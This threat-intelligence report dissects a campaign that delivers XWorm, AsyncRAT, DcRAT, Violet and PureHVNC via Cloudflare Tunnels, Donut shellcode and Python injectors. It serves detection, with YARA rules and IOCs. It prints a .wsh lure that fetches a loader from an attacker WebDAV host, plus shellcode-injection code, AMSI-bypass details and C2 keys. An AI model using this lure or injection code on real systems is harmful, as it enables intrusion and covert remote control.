Investigated: March 6, 2026 | Published: March 6, 2026

Five RATs, One Tunnel: Dissecting a Multi-Family Malware Campaign Abusing Cloudflare and WsgiDAV

Threat Actors: DcRatByqwqdanchun
#rat #asyncrat #xworm #social-engineering #credential-theft #c2 #apt

Published: 2026-03-08 Author: breakglass.intelligence Tags: RAT, Cloudflare Tunnel, Donut, XWorm, AsyncRAT, DcRAT, Violet, PureHVNC, Open Directory


TL;DR

A threat actor is operating a multi-stage malware delivery chain across four coordinated Cloudflare Tunnels backed by a WsgiDAV open directory. The campaign delivers five distinct RAT families (XWorm, AsyncRAT, DcRAT, Violet, and PureHVNC) via Donut-packed shellcode injected into explorer.exe. All C2 infrastructure converges on two IPs in the same AT&T /24 subnet, confirming a single operator running simultaneous RAT listeners targeting the United Kingdom.


Campaign Overview

On March 5, 2026, we identified an actively serving WsgiDAV 4.3.0 open directory behind a Cloudflare Tunnel at fuji-layout-exterior-bunch.trycloudflare[.]com. What initially appeared to be a single-family RAT distribution turned out to be a coordinated multi-tunnel, multi-family operation with a build pipeline generating uniquely encrypted variants on a monthly cadence.

The attack chain spans seven stages, moving from a .wsh lure masquerading as a scanned PDF through JScript loaders, batch downloaders, Python-based shellcode injectors, Donut framework shellcode, and finally five .NET RAT payloads executing entirely in memory.

Stage 1: .wsh lure (Scan_0630274892048.pdf.wsh)
  | WebDAV UNC path
Stage 2: .wsf JScript loader (ukmar03.wsf)
  | WebDAV file copy
Stage 3a: .bat downloader (UKM031.txt -> .bat)
  | curl from 4th tunnel
Stage 3b: .bat executor (UKM032.txt -> .bat)
  | extracts ZIPs, runs Python
Stage 4: ZIP payloads (1Feb02MA.zip, 1Feb02ST.zip)
  | Python 3.12 x64 + PyCryptodome
Stage 5: Python shellcode injectors (9 scripts)
  | AES-CBC + double-XOR decryption
Stage 6: Donut shellcode -> explorer.exe injection
  | Chaskey-LTS CTR decryption, AMSI bypass
Stage 7: .NET RAT payloads (XWorm, AsyncRAT, DcRAT, Violet, PureHVNC)

Infrastructure: Four Tunnels, One Machine

The actor operates four active Cloudflare Tunnels, each serving a specific stage of the delivery chain:

Tunnel                                                 Role                          Display Name
fuji-layout-exterior-bunch[.]trycloudflare[.]com       Stage 1: .wsh lure hosting    M03UKLK
dialogue-pool-cookie-mini[.]trycloudflare[.]com        Stage 2: .wsf loader hosting  M03UKWF
stickers-gentleman-queen-dreams[.]trycloudflare[.]com  Stage 3: .bat downloaders     M02UKBT
empire-judge-delhi-finest[.]trycloudflare[.]com        Stage 4: ZIP payloads         M02UKZP

A fifth tunnel (statutes-scripts-friendship-switch[.]trycloudflare[.]com) was referenced in a January 2026 variant but is now dead.

All four active tunnels report identical quota-used-bytes: 27964350464 in their HTTP headers, confirming they run on the same underlying machine. The display names follow a clear naming convention, M[month][year]UK[type], where UK indicates the target geography (United Kingdom) and the suffix encodes the payload type (LK=link, WF=WSF, BT=batch, ZP=zip).

The WsgiDAV server itself runs anonymously with no authentication, giving full read-write access over WebDAV:

Server: WsgiDAV/4.3.0 CPython/3.12.6
Backend: cheroot/10.0.1
Access: Anonymous (no authentication)

Stage 1-3: From Lure to Loader

The .wsh Lure

The initial access vector is a Windows Script Host shortcut file disguised as a scanned PDF (Scan_0630274892048.pdf.wsh, 128 bytes). When executed, it reaches out via WebDAV to the second tunnel:

[ScriptFile]
Path=\\dialogue-pool-cookie-mini.trycloudflare.com@SSL\DavWWWRoot\et\ukmar03.wsf

[Options]
UseEngine=JScript

JScript Loader

The .wsf loader (ukmar03.wsf, 666 bytes) copies two batch files from the third tunnel to %USERPROFILE%\Contacts\, renames them from .txt to .bat, and executes them with a 90-second delay between stages. The .txt extension on the tunnel avoids content-type filtering; the rename to .bat happens locally.

Batch Downloaders

Two batch scripts handle payload retrieval and execution:

UKM031.bat (downloader): Uses curl to pull from the fourth tunnel:

  • 1Feb02MA.zip extracts to %USERPROFILE%\Contacts\MainRingtones (main payload)
  • 1Feb02ST.zip extracts to %USERPROFILE%\Contacts\str (secondary/redundant payload)
  • 1Feb02SU.txt drops to the Startup folder for persistence

UKM032.bat (executor): Runs the Python injectors, then cleans up:

  • Executes python.exe *.py from MainRingtones\Python312x64\
  • Creates py_parent.vbs, a WMI script that kills python.exe processes that are parents of explorer.exe (cleaning up after PPID spoofing)
  • Hides payload folders with attrib +h
  • Deletes all .bat files from the Contacts folder

This is noteworthy: the actor ships a full Python 3.12 distribution bundled with PyCryptodome inside the ZIP payload. Using python.exe as the injector process is a deliberate evasion choice: it is a legitimate, signed Microsoft binary that will not trigger most application whitelisting or EDR heuristics on its own.


Stage 5: Python Shellcode Injectors

Each ZIP contains multiple Python scripts, each delivering a different RAT family. The main payload (1Feb02MA.zip, 14.2 MB) contains five scripts; the secondary (1Feb02ST.zip, 14.1 MB) contains four overlapping variants with SA/S prefixes, providing redundancy if the main payload is detected.

Script Pattern        RAT Family                 Shellcode Size
1Xwrmmmm...Mar05.py   XWorm V3.1                 73,474 bytes
1annnnn...Mar05.py    DcRAT (Infected-Anarchy)   103,170 bytes
1assss...Mar05.py     AsyncRAT                   84,738 bytes
1hvvvv...Mar05.py     PureHVNC (Ygfumkl)         369,922 bytes
1UKviooo...Mar05.py   Violet v5                  101,634 bytes

All nine scripts use identical injection code:

# Decryption: AES-256-CBC + double XOR (per-sample keys)
from Crypto.Cipher import AES  # PyCryptodome, bundled inside the ZIP payload

cipher = AES.new(aes_key, AES.MODE_CBC, iv)
decrypted = bytearray(cipher.decrypt(ciphertext))  # bytearray: bytes is immutable, in-place XOR needs it
for i in range(len(decrypted)):
    decrypted[i] ^= xor_key_1[i % len(xor_key_1)]
    decrypted[i] ^= xor_key_2[i % len(xor_key_2)]

# Injection: APC injection into suspended explorer.exe (abbreviated; ctypes setup omitted)
hProcess = CreateProcessA("explorer.exe", ..., CREATE_SUSPENDED)
addr = VirtualAllocEx(hProcess, ..., MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
WriteProcessMemory(hProcess, addr, shellcode, len(shellcode))
QueueUserAPC(addr, hThread, 0)
ResumeThread(hThread)

Each sample uses unique AES keys, IVs, and XOR keys: the build pipeline generates fresh cryptographic material per variant while reusing the injection template.


Stage 6: Donut Shellcode Framework

All nine injectors produce Donut framework shellcode that loads .NET assemblies entirely in memory. During analysis we identified a non-standard implementation detail that breaks most public Donut decryptors.

Donut Configuration

  • Cipher: Chaskey-LTS (16 rounds) in CTR mode
  • Instance header: 0x230 bytes, encrypted with master key at blob[4:20], nonce at blob[20:36]
  • AMSI bypass: Patches AmsiInitialize, AmsiScanBuffer, AmsiScanString
  • WLDP bypass: Patches WldpQueryDynamicCodeTrust, WldpIsClassInApprovedList
  • CLR hosting: Loads mscoree.dll to host .NET runtime, calls Assembly.Load() for fileless execution
  • Module type: 4 (EXE); all payloads are .NET PE32 executables

Non-Standard CTR Counter

The CTR counter increments from byte 15 down to byte 0 (big-endian 128-bit increment), not the standard little-endian uint32/uint64 increment most analysis tools assume. This was confirmed by disassembling the counter increment loop at shellcode offset 0x100cf. If you are writing a Donut decryptor and getting garbage output, this is likely why.
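Added example, not the post's tooling: a Donut instance decryptor for the Chaskey-LTS CTR variant described above, with the big-endian counter increment beside the uint32 increment most tools assume, so the "garbage after the first block" symptom can be reproduced on a constructed blob. The Chaskey round function is a reimplementation of the published permutation; the key and nonce offsets follow the post, and the encrypted region starting at offset 36 is an assumption.

```python
import struct

MASK32 = 0xFFFFFFFF
KEY_OFF, NONCE_OFF, ENC_OFF = 4, 20, 36   # key/nonce offsets from the post; ENC_OFF is assumed


def rotl32(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def chaskey_lts_block(key, block):
    """Chaskey used as a 128-bit block cipher: key XOR, 16 rounds (LTS), key XOR.
    Round function reimplemented from the published Chaskey permutation."""
    k = struct.unpack("<4I", key)
    v = [w ^ kw for w, kw in zip(struct.unpack("<4I", block), k)]
    for _ in range(16):
        v[0] = (v[0] + v[1]) & MASK32
        v[1] = rotl32(v[1], 5) ^ v[0]
        v[2] = (v[2] + v[3]) & MASK32
        v[3] = rotl32(v[3], 8) ^ v[2]
        v[2] = (v[2] + v[1]) & MASK32
        v[0] = (rotl32(v[0], 16) + v[3]) & MASK32
        v[3] = rotl32(v[3], 13) ^ v[0]
        v[1] = rotl32(v[1], 7) ^ v[2]
        v[2] = rotl32(v[2], 16)
    return struct.pack("<4I", *(w ^ kw for w, kw in zip(v, k)))


def next_counter_be128(ctr):
    """Counter update the post observed at offset 0x100cf: ++byte[15], carry toward byte 0."""
    c = bytearray(ctr)
    for i in range(15, -1, -1):
        c[i] = (c[i] + 1) & 0xFF
        if c[i]:
            break
    return bytes(c)


def next_counter_le32(ctr):
    """The increment most public decryptors assume: little-endian uint32 in bytes 0..3."""
    c = bytearray(ctr)
    struct.pack_into("<I", c, 0, (struct.unpack_from("<I", c)[0] + 1) & MASK32)
    return bytes(c)


def chaskey_ctr(key, nonce, data, step=next_counter_be128):
    """CTR mode: XOR each 16-byte block with E_key(counter); encrypt and decrypt are identical."""
    out = bytearray()
    ctr = bytes(nonce)
    for off in range(0, len(data), 16):
        keystream = chaskey_lts_block(key, ctr)
        out += bytes(a ^ b for a, b in zip(data[off:off + 16], keystream))
        ctr = step(ctr)
    return bytes(out)


def decrypt_donut_instance(blob, inst_len=0x230, step=next_counter_be128):
    """Recover the encrypted instance region using key blob[4:20] and nonce blob[20:36]."""
    key = blob[KEY_OFF:KEY_OFF + 16]
    nonce = blob[NONCE_OFF:NONCE_OFF + 16]
    return chaskey_ctr(key, nonce, blob[ENC_OFF:ENC_OFF + inst_len], step)


def build_sample_blob(key, nonce, instance):
    """Constructed test blob, not a real sample: [len][key][nonce][CTR-encrypted instance]."""
    enc = chaskey_ctr(key, nonce, instance)
    return struct.pack("<I", ENC_OFF + len(enc)) + key + nonce + enc


if __name__ == "__main__":
    k, n = bytes(range(16)), bytes(range(16, 32))
    inst = bytes((i * 7) & 0xFF for i in range(0x230))
    blob = build_sample_blob(k, n, inst)
    print("big-endian counter recovers instance:", decrypt_donut_instance(blob) == inst)
    print("uint32 counter recovers instance:    ", decrypt_donut_instance(blob, step=next_counter_le32) == inst)
```

With the uint32 increment only the first 16 bytes decrypt correctly, which is exactly the partial-garbage symptom described above.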


Stage 7: The RAT Payload Arsenal

XWorm V3.1

Field      Value
SHA256     ed4fb8fe...edb85145dc
Assembly   XClient3-01-15.exe (.NET 4.0, 41,256 bytes)
C2         hy647dhon.duckdns[.]org:8292
Auth Key   <123456789>, Delimiter: <Xwormmm>
Mutex      lOyuApQB7sBGSt3o

Config encryption uses AES-256-ECB with a key derived from MD5(Mutex); notably, it uses the Mutex field, not the KEY field. The MD5 hash is copied to bytes [0:16] and [15:31] to form the 32-byte AES key.

Capabilities include DDoS, keylogging, screen capture, a plugin system, browser credential recovery, USB worm spreading (USB.exe), UAC bypass, ngrok tunneling, and 24+ command handlers.

AsyncRAT 0.5.7B

Field      Value
SHA256     4bb4a303...e9ef746181aa29
Assembly   AsyncClient.exe (.NET 4.0, 52,520 bytes)
C2         uejrhnfq.duckdns[.]org:6745
Mutex      AsyncMutex_6SI8OkPnk
Install    false (fileless)

Config encryption uses AES-256-CBC with PBKDF2-HMAC-SHA1 (50,000 iterations):

Key:  Ff6VygGEmXLxZ17uU1fqBwyv7Not5Jtw
Salt: bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Wire format: [HMAC-SHA256(32)] [IV(16)] [AES-CBC ciphertext]

The server certificate (CN=AsyncRAT Server, RSA 4096-bit, SHA-512, valid 2024-05-25 to 9999-12-31) was confirmed live on port 6745 using TLSv1.0 with ECDHE-RSA-AES256-SHA, an outdated TLS version that serves as a strong network detection indicator.

Anti-analysis features include VMware/VirtualBox/Sandboxie detection (SbieDll.dll check) and CheckRemoteDebuggerPresent. The registry persistence path is stored reversed: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS.

DcRAT / Infected-Anarchy

Field         Value
SHA256        58d9f039...cb44917d4a5c75af
Assembly      Infected-Anarchy-15-01.exe (.NET 4.5, 70,952 bytes)
C2            y57kdsa.duckdns[.]org:7878
Attribution   DcRatByqwqdanchun

This is a modified AsyncRAT fork by qwqdanchun with significant enhancements:

  • AMSI bypass: Runtime patching of AmsiScanBuffer in amsi.dll
  • ETW bypass: Runtime patching of EtwEventWrite
  • NtProtectVirtualMemory unhooking + D/Invoke dynamic API resolution
  • Anti-analysis process killing: Terminates Taskmgr.exe, ProcessHacker.exe, procexp.exe, MsMpEng.exe, MpCmdRun.exe, NisSrv.exe, Regedit.exe, taskkill.exe, and more
  • Camera/microphone access via DirectShow GUIDs
  • UAC bypass via mscfile/ms-settings fodhelper

The server certificate is particularly revealing: CN=DcRat, Issuer: C=CN, L=SH, O=DcRat By qwqdanchun, OU=qwqdanchun, CN=EBOLA; RSA 1024-bit (weaker than the AsyncRAT cert), valid 2023-09-07 to 2034-06-16.

Violet v5

Field       Value
SHA256      4b6d47e0...2d8e0d226981eba
Size        69,416 bytes
C2          volvogroup20.duckdns[.]org:2120
Delimiter   <Violet>, Mutex: XSRSXSX

Config encryption uses double-base64 encoding plus XOR with a repeating key AGZOVok (7 bytes) hardcoded inside the decrypt function; the Settings class stores E8R1a8yU1baxo8ok separately as the C2 authentication key.

Violet brings capabilities the other RATs lack: a clipper (clipboard hijacking for cryptocurrency theft), a bot-killer (eliminating competing malware), and a fake update screen to mask malicious activity. It also includes ngrok tunneling for RDP, credential stealing, network discovery, and an HTTP DDoS module with spoofed User-Agent headers and fake POST payloads (Content-length: 5235).

The volvogroup20 DuckDNS subdomain may indicate social engineering targeting Volvo Group or an attempt to impersonate their infrastructure.

Persistence artifacts:

3d847c5c-4f5a-4918-9e07-a96cea49048d.exe
89c43fcf-5e52-4be7-a719-a26139ce636a.exe
WinSc32.exe
WinTempClean32.bat

PureHVNC via Ygfumkl Packer

Field             Value
SHA256 (packer)   f56a53ec...c50067f2a
Packer assembly   Ygfumkl.exe (337,704 bytes)
Inner payload     Lhjknyy.dll (788,480 bytes)
C2                12.202.180.133:6757 (confirmed via infrastructure correlation)

This is the most heavily protected payload in the campaign, using triple-layer protection:

  1. Donut shellcode (Chaskey-LTS encryption, AMSI/WLDP bypass)
  2. Ygfumkl AES packer (AES-256-CBC decryption + GZip decompression + reflective loading)
  3. ConfuserEx (runtime IL generation, proxy delegate pattern)

The packer's execution flow:

Main -> MoveDriver -> Yntjen (AES decrypt 311,904-byte blob)
  Key: e045928c7f43069d4887ab8aeffa9d81a073dfd69c4ee38c8e27e15f63f1f80c
  IV:  7b8b83514851470a22d5ff0a2201a100
-> Uuuqsgnerjy (GZip decompress)
-> Assembly.Load -> InvokeMember("ManageSegmentedDic")

The inner payload is PureHVNC, a hidden VNC RAT that provides stealthy remote desktop access without the victim's awareness. It uses protobuf-based C2 communication, process hollowing via dynamically-resolved kernel32 APIs (strings split to evade static detection), and AES-encrypted C2 traffic with X.509 TLS validation.

ConfuserEx protection makes static config extraction intractable: each config field is split into separate single-field proxy classes (ProxyEncryptor, ProxyField, ProxyIterator) with key material derived through obfuscated integer constants and bit manipulation at runtime.

The C2 was identified through infrastructure correlation: port scanning the shared C2 IP 12.202.180.133 revealed port 6757 with a TLS certificate (CN=Zwfweayg) matching the same cipher suite and key parameters as the AsyncRAT listener on the same host.


C2 Infrastructure Analysis

All five RATs use DuckDNS dynamic DNS for C2 resolution, converging on two IPs in the same AT&T /24 subnet:

RAT          C2 Domain                      Port   IP               Status
XWorm V3.1   hy647dhon[.]duckdns[.]org      8292   12.202.180.133   Filtered
AsyncRAT     uejrhnfq[.]duckdns[.]org       6745   12.202.180.133   Live
DcRAT        y57kdsa[.]duckdns[.]org        7878   12.202.180.133   Filtered
PureHVNC     (infra correlation)            6757   12.202.180.133   Live
Violet v5    volvogroup20[.]duckdns[.]org   2120   12.202.180.105   Live

Both IPs sit on AT&T infrastructure (AS7018). The .133 host runs three RAT listeners; the .105 host runs one. The proximity within a single /24 strongly suggests a compromised AT&T business customer or a residential connection with multiple static IPs.

C2 Protocol Emulation Results

We developed full protocol emulators for all three live C2 services. Key findings:

AsyncRAT (port 6745): Our emulator successfully derived the correct AES-256 key via PBKDF2 (50,000 iterations), constructed a valid encrypted ClientInfo packet, and maintained a connection for 3 minutes with Pong keepalives every 30 seconds. The server accepted our TLS handshake and encrypted packets silently but never responded, likely requiring ServerSignature verification or additional validation beyond what static analysis reveals.

Violet v5 (port 2120): The server uses plain TCP (no TLS). We discovered through extensive testing that the protocol is text-based, not binary length-prefixed as initially assumed: the server sends TCP RST on any packet containing null bytes. Registration requires a 23-field array joined by the <Violet> delimiter, XOR-encrypted with key AGZOVok. The server strictly validated and rejected all emulated registrations.

PureHVNC (port 6757): ConfuserEx protection blocked static extraction of the protobuf schema. Length-prefixed protobuf was the only format the server actively rejected (immediate CLOSE vs timeout on other formats), suggesting it recognized the framing but rejected the message content.

All three C2 servers implement strict client validation that prevents bot enumeration or command extraction without sandbox execution of the actual malware.


Campaign Timeline and Evolution

Date         Event
2025-09      Sep01x86_Ayoo.zip created (earliest artifact on open directory)
2025-11-28   Sep01x86_Ayoo.zip last modified
2026-01-16   1ukj16.wsf variant active, references now-dead tunnel
2026-02      UKM02* batch scripts created (M02 = February)
2026-03-05   Current campaign active (M03 = March, "Mar05" in Python filenames)

The naming convention M[month][year]UK[type] and the monthly tunnel rotation indicate an organized, iterative build process. Cross-campaign file reuse (UKM021.txt = UKM031.txt = UKM051.txt) shows the actor updates lure infrastructure monthly while keeping the core delivery mechanism stable.


Persistence Mechanisms

The campaign implements layered persistence:

  1. Startup folder batch scripts: launch Python injectors on boot from four different paths
  2. Scheduled tasks: schtasks /sc onlogon /rl highest (AsyncRAT, DcRAT)
  3. Registry Run keys: Software\Microsoft\Windows\CurrentVersion\Run\ (AsyncRAT, DcRAT, Violet)
  4. WMI helper scripts: py_parent.vbs / DiscordDial.vbs for process cleanup after injection

The startup script launches Python from four locations, including an %APPDATA%\Winic\30.3.0rc50\Python312x32 path that uses a different injection mode, killing explorer.exe and nslookup.exe parent processes rather than just Python parents. This suggests the x86 variant may inject into different target processes.


MITRE ATT&CK Mapping

Technique                                      ID          Implementation
User Execution: Malicious File                 T1204.002   .wsh masquerading as PDF
Command and Scripting: JScript                 T1059.007   .wsf with ActiveXObject
Command and Scripting: Windows Command Shell   T1059.003   .bat downloaders/executors
Command and Scripting: Python                  T1059.006   Python shellcode injectors
Ingress Tool Transfer                          T1105       curl download of ZIP payloads
Process Injection: APC Injection               T1055.004   QueueUserAPC into suspended explorer.exe
Process Injection: Process Hollowing           T1055.012   PureHVNC via VirtualAlloc/WriteProcessMemory
Obfuscated Files: Software Packing             T1027.002   Donut shellcode packer
Obfuscated Files: Encrypted/Encoded File       T1027.013   AES-CBC + XOR + base64 layers
Reflective Code Loading                        T1620       Assembly.Load() .NET reflection
Boot/Logon Autostart: Startup Folder           T1547.001   Startup batch scripts
Scheduled Task/Job                             T1053.005   schtasks /sc onlogon
Modify Registry                                T1112       Run key persistence
Impair Defenses: Disable or Modify Tools       T1562.001   AMSI/ETW/WLDP bypass, Defender process killing
Virtualization/Sandbox Evasion                 T1497.001   VMware/VirtualBox/Sandboxie detection
Hidden Files and Directories                   T1564.001   attrib +h on payload directories
Dynamic Resolution: DNS                        T1568.002   DuckDNS dynamic DNS for all C2
Encrypted Channel: Asymmetric Crypto           T1573.002   AsyncRAT TLS with self-signed RSA-4096
Non-Standard Port                              T1571       C2 on ports 2120, 6745, 6757, 7878, 8292
Remote Services: VNC                           T1021.005   PureHVNC hidden VNC
Clipboard Data                                 T1115       Violet clipper
Input Capture: Keylogging                      T1056.001   XWorm, Violet keyloggers

Detection Opportunities

Network Signatures

TLS certificate fingerprinting is the highest-confidence detection for this campaign:

# AsyncRAT C2 certificate
SHA256: 2b72190cc9dca7d06ab6190cf16be8ad28ad8d1d5d60f96ae5984e1bf4bfb44b
CN:     AsyncRAT Server
Serial: A4:06:7A:DE:36:62:16:46:C1:7E:66:DA:15:4B:77

# PureHVNC C2 certificate
SHA256: 834efbdd063bba262d8f2c4a7ee7b0907f090f9f9d5424999ecae0d305a24b77
CN:     Zwfweayg
Serial: 90:B9:FF:33:2A:AE:E6:3F:72:D6:7A:29:3F:6C:65

# DcRAT C2 certificate
CN:     DcRat
Issuer: C=CN, L=SH, O=DcRat By qwqdanchun, OU=qwqdanchun, CN=EBOLA

Additional network indicators:

  • TLSv1.0 connections to non-standard ports (6745, 6757); modern software uses TLSv1.2+
  • DNS queries for *.duckdns.org subdomains: hy647dhon, uejrhnfq, y57kdsa, volvogroup20
  • TCP traffic containing <Violet> delimiter (port 2120, plaintext)
  • TCP traffic containing <Xwormmm> field separator (XWorm)

Host Signatures

# Mutex names
lOyuApQB7sBGSt3o          (XWorm)
AsyncMutex_6SI8OkPnk       (AsyncRAT)
XSRSXSX                    (Violet)

# File paths
%USERPROFILE%\Contacts\MainRingtones\Python312x64\
%USERPROFILE%\Contacts\str\python312x64\
%APPDATA%\Winic\30.3.0rc50\Python312x32\

# WMI helper scripts
py_parent.vbs
DiscordDial.vbs

# Violet persistence
3d847c5c-4f5a-4918-9e07-a96cea49048d.exe
89c43fcf-5e52-4be7-a719-a26139ce636a.exe
WinSc32.exe

# PureHVNC packer indicators
Assembly: Ygfumkl.exe
Entry type: Lhjknyy.Collections.DicProfiler
Namespaces: PureHVNC_Lib.*, Lhjknyy.*

YARA Rules

rule CloudflareMultiRAT_AsyncRAT_TLS_Cert {
    meta:
        description = "AsyncRAT C2 server TLS certificate - WsgiDAV/Cloudflare campaign"
        author = "breakglass.intelligence"
        date = "2026-03-05"
        severity = "high"
    strings:
        $serial = { A4 06 7A DE 36 62 16 46 C1 7E 66 DA 15 4B 77 }
        $cn = "AsyncRAT Server"
    condition:
        any of them
}

rule CloudflareMultiRAT_PureHVNC_Ygfumkl {
    meta:
        description = "Ygfumkl .NET packer delivering PureHVNC - WsgiDAV/Cloudflare campaign"
        author = "breakglass.intelligence"
        date = "2026-03-05"
        severity = "high"
    strings:
        $ns1 = "Lhjknyy.Collections.DicProfiler" ascii wide
        $ns2 = "ManageSegmentedDic" ascii wide
        $ns3 = "PureHVNC_Lib" ascii wide
        $aes_iv = { 7b 8b 83 51 48 51 47 0a 22 d5 ff 0a 22 01 a1 00 }
        $entry = "Ygfumkl" ascii wide
    condition:
        uint16(0) == 0x5A4D and (2 of ($ns*) or $aes_iv or ($entry and any of ($ns*)))
}

rule CloudflareMultiRAT_PureHVNC_TLS_Cert {
    meta:
        description = "PureHVNC C2 server TLS certificate - WsgiDAV/Cloudflare campaign"
        author = "breakglass.intelligence"
        date = "2026-03-05"
        severity = "high"
    strings:
        $serial = { 90 B9 FF 33 2A AE E6 3F 72 D6 7A 29 3F 6C 65 }
        $cn = "Zwfweayg"
    condition:
        any of them
}

rule CloudflareMultiRAT_Python_Injector {
    meta:
        description = "Python shellcode injector pattern - WsgiDAV/Cloudflare campaign"
        author = "breakglass.intelligence"
        date = "2026-03-05"
        severity = "high"
    strings:
        $api1 = "QueueUserAPC" ascii
        $api2 = "VirtualAllocEx" ascii
        $api3 = "WriteProcessMemory" ascii
        $api4 = "CreateProcessA" ascii
        $crypto1 = "AES" ascii
        $crypto2 = "MODE_CBC" ascii
        $target = "explorer.exe" ascii
        $flag = "CREATE_SUSPENDED" ascii
    condition:
        filesize < 600KB and
        all of ($api*) and any of ($crypto*) and $target and $flag
}

IOCs

File Hashes (SHA256)

Delivery Chain:


Extracted .NET RAT Payloads:


Network IOCs

Cloudflare Tunnels:

fuji-layout-exterior-bunch[.]trycloudflare[.]com
dialogue-pool-cookie-mini[.]trycloudflare[.]com
stickers-gentleman-queen-dreams[.]trycloudflare[.]com
empire-judge-delhi-finest[.]trycloudflare[.]com
statutes-scripts-friendship-switch[.]trycloudflare[.]com  (dead)

C2 Domains:

hy647dhon[.]duckdns[.]org:8292       (XWorm)
uejrhnfq[.]duckdns[.]org:6745       (AsyncRAT)
y57kdsa[.]duckdns[.]org:7878         (DcRAT)
volvogroup20[.]duckdns[.]org:2120    (Violet v5)

C2 IPs:

12.202.180.133  (AT&T AS7018; AsyncRAT:6745, PureHVNC:6757, DcRAT:7878, XWorm:8292)
12.202.180.105  (AT&T AS7018; Violet:2120)

Encryption Keys

# XWorm
AES key derivation: MD5("lOyuApQB7sBGSt3o") = c08a658232fb2e0a990d0720e656c8e8
Auth key: <123456789>
Delimiter: <Xwormmm>

# AsyncRAT
PBKDF2 key: Ff6VygGEmXLxZ17uU1fqBwyv7Not5Jtw
PBKDF2 salt: bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
Iterations: 50,000 (HMAC-SHA1)

# DcRAT
PBKDF2 key: EqobtaJh1ra1l2Px0fjvG8Ircxdf2e2P
PBKDF2 salt: DcRatByqwqdanchun (UTF-8)
Iterations: 50,000 (HMAC-SHA1)

# Violet v5
XOR decrypt key: AGZOVok (7 bytes, hardcoded in decrypt function)
Auth key: E8R1a8yU1baxo8ok
Delimiter: <Violet>
Mutex: XSRSXSX

# PureHVNC/Ygfumkl packer
AES-256-CBC key: e045928c7f43069d4887ab8aeffa9d81a073dfd69c4ee38c8e27e15f63f1f80c
AES-256-CBC IV:  7b8b83514851470a22d5ff0a2201a100

This investigation was conducted by breakglass.intelligence on 2026-03-05. IOCs are provided for defensive purposes. If you observe this infrastructure in your environment, the actor likely has full remote access including hidden VNC, keylogging, clipboard hijacking, and credential theft capabilities deployed simultaneously across multiple RAT families.
